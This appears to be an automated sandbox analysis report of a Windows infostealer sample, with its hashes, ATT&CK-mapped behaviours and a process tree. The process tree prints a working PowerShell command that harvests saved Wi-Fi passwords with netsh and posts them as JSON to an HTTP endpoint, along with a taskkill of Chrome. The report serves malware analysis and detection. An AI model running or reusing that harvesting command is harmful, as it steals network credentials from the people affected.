Overview

overview

10

Static

static

10

2025-03-06...ch.exe

windows7-x64

1

2025-03-06...ch.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    90s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/03/2025, 02:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-03-06_9784274d90b1a971668186bd04ea4059_frostygoop_luca-stealer_poet-rat_sliver_snatch.exe

  • Size

    23.9MB

  • MD5

    9784274d90b1a971668186bd04ea4059

  • SHA1

    845f0e883e7b37c5531fe1e7f1f4f8e5fe3f50de

  • SHA256

    dd663cb5b02e8b028bf81adf8e9ae6ae86494d7a283ba88ab6aec7845064c3d7

  • SHA512

    5b973091579b9e7d25f64bc802f79c597195ca61527259f79e76b92a1b7a20754a77520d9a697ccf55cbdcc9598deeab9a1e92513a3f6bd6d7d97788ab42f100

  • SSDEEP

    196608:6dfRWRKnCaV266bE5Ne/ZTqz3XOYjMjlQY:61Ca0Y5NtNA5Q

Score
7/10
discoveryexecutionpersistenceprivilege_escalationspywarestealer

Malware Config

Signatures

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Kills process with taskkill 1 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-06_9784274d90b1a971668186bd04ea4059_frostygoop_luca-stealer_poet-rat_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-06_9784274d90b1a971668186bd04ea4059_frostygoop_luca-stealer_poet-rat_sliver_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:5072
    • C:\Windows\System32\taskkill.exe
      C:\Windows\System32\taskkill.exe /IM chrome.exe /F /T
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:4456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command " $profiles = netsh wlan show profiles | Select-String \"All User Profile\" | ForEach-Object { $_.ToString().Split(\":\")[1].Trim() }; $wifiProfiles = @(); foreach ($profile in $profiles) { $profileDetails = netsh wlan show profile name=\"$profile\" key=clear; $passwordMatch = $profileDetails | Select-String \"Key Content\"; if ($passwordMatch) { $password = $passwordMatch.ToString().Split(\":\")[1].Trim(); } else { $password = \"No password found\"; } $wifiProfiles += [PSCustomObject]@{ SSID = $profile; Password = $password } }; $json = $wifiProfiles | ConvertTo-Json; try { Invoke-RestMethod -Uri \"http://localhost:9382/api/wifi\" -Method Post -Body $json -ContentType \"application/json\"; } catch { Write-Error \"Failed to send data: $_\" } "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Network Configuration Discovery: Wi-Fi Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5080
      • C:\Windows\system32\netsh.exe
        "C:\Windows\system32\netsh.exe" wlan show profiles
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:1660

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ed1amux.w3r.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/5080-0-0x00007FFE26733000-0x00007FFE26735000-memory.dmp

    Filesize

    8KB

    Download

  • memory/5080-1-0x000001698CC10000-0x000001698CC32000-memory.dmp

    Filesize

    136KB

    Download

  • memory/5080-11-0x00007FFE26730000-0x00007FFE271F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5080-12-0x00007FFE26730000-0x00007FFE271F1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/5080-13-0x00000169A7660000-0x00000169A7822000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/5080-16-0x00007FFE26730000-0x00007FFE271F1000-memory.dmp

    Filesize

    10.8MB

    Download